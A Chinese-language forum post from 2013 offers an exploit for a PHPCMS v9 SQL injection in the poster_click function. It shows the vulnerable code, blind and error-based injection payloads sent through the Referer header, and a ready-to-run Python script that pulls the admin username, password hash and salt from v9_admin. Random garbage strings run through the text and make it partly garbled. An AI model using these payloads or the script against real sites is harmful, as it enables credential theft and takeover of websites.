有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:
7 M% \8 C/ p$ j" ?
# S. [( O: p& N' X& H问题函数\phpcms\modules\poster\index.php2 Q- S% u5 J1 U
3 U- X* x# A/ p
public function poster_click() {
$ b1 h7 g! K) e/ v/ s" o$id = isset($_GET['id']) ? intval($_GET['id']) : 0;
0 B; K" v; D" r; w$r = $this->db->get_one(array('id'=>$id));
2 t. F) S, M) y5 b/ Qif (!is_array($r) && empty($r)) return false;' M4 j5 Z, H2 M5 M/ L. z
$ip_area = pc_base::load_sys_class('ip_area');
' |' A' c* S: b; M- ?$ip = ip();; m" U) a2 W9 t. m3 G# \
$area = $ip_area->get($ip);
6 T ?0 Z% V3 P. Q8 \$username = param::get_cookie('username') ? param::get_cookie('username') : '';+ M6 {6 m# q9 t9 y( Y7 h2 c Q
if($id) {
; Q" K6 p$ R* L1 r9 g+ Y1 Q7 g$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid(); L+ j& x. G7 l
$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));% }5 ~1 H$ U3 w
}
- [3 u$ \3 m- w$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));
( S: m# F: i3 i$setting = string2array($r['setting']);8 ]2 @5 Y/ Q. ^% Q! L1 |2 m
if (count($setting)==1) {* o3 p$ {* i' Z- e& {1 Z1 S% r1 J4 K
$url = $setting['1']['linkurl'];
. e( L/ S: t6 k' W( i' J} else {
2 E; w% D7 n( t$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];1 y( y. A# o& I
}) P9 w( c Q9 G8 S
header('Location: '.$url);
& e- x% F, p6 V+ j/ M+ p}3 e7 o! {1 a; Q9 ?: N! _
( W5 S/ h0 u, K; ^* p2 u! B# @
' J4 k' o9 U2 \9 E8 H# H/ j0 L0 N7 u Z. N% q. p! V! F
利用方式:" N* K; f" b2 h2 @8 K
( z, @) v1 ]) U a7 b0 F& D8 P* N1、可以采用盲注入的手法: f N1 M6 w7 A' f! G* O0 [- `
H' F# C! x: v$ L, x! N* `* W
referer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#8 @# m% v% O( O: h5 @
4 D _) S/ t3 G. N& d# P通过返回页面,正常与否一个个猜解密码字段。
4 m1 j5 x+ M$ c
2 { _0 C: E' k ]1 ^2、代码是花开写的,随手附上了:
2 S3 O; V% G% f& D" \) P
% Y7 T) d, h$ ~, H8 ]1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#4 I; Q2 }3 u/ r9 @/ i
+ t3 k% E, P- Z# i# M此方法是爆错注入手法,原理自查。
0 S" `. }5 o7 d- z5 z9 S! W5 r& I8 R# W* \
7 Y. n+ z2 Z! t" x. M6 c( ]: P* s# S5 v
利用程序:
Z v+ y* B* J3 x& { l! z A& f& M$ d) ^; o# }. J, @7 m( o4 {, P
#!/usr/bin/env python) }! [) B4 a/ v+ D
import httplib,sys,re
. b; Q$ d& N0 P; g$ R* R- k, G6 Z; m- B/ _' L
def attack():4 T& [# h; r/ B! ]8 x3 u
print “Code by Pax.Mac Team conqu3r!”4 C8 ?# {" Z% @8 r* e& J3 m7 L3 z
print “Welcome to our zone!!!”
3 r& d8 H& |0 `# B* |url=sys.argv[1]6 X8 P/ I6 s) @: d$ v* O+ k
paths=sys.argv[2]
1 ~8 }6 K1 c- [6 Q) Bconn = httplib.HTTPConnection(url)
, u% ]8 Z+ X! Y: l8 {# Y+ P; Oi_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,
8 r0 n3 h! t6 `5 h“Accept”: “text/plain”,$ w& E+ w! D2 Q
“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}0 J% W( k% e/ h% [8 p' G
conn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers). t+ n; A/ \' N( N# E
r1 = conn.getresponse()3 H8 n5 w! B6 J, H( h- D) {9 k
datas=r1.read()4 j, g+ N: {+ w8 ~1 q
datas=re.findall(r”Duplicate entry \’\w+’”, datas)* R0 J; L0 _, J* ]
print datas[0]7 u& Y0 _/ J+ i* S8 Z5 J
conn.close()
+ P* l$ f/ c! ]4 ]if __name__==”__main__”:: f! x# e! A+ S; c0 y* g0 Y' b2 y
if len(sys.argv)<3:) U8 w2 N u$ ^" A6 G4 c
print “Code by Pax.Mac Team conqu3r”# l- q8 e2 K( Q
print “Usgae:”' ?4 V U- V" s' x6 k
print “ phpcmsattack.py www.paxmac.org /”
* M% T" h" e- I6 |1 cprint “ phpcmsataack.py www.paxmac.org /phpcmsv9/”
# Y: N) }8 M+ ]+ Z+ Psys.exit(1)
C# j3 ~ H& I7 Sattack()
& o( }) `6 f: x
4 l3 r) r- `7 z) N2 g% R7 F |
发表于 2013-1-11 21:01:00
收藏
支持
反对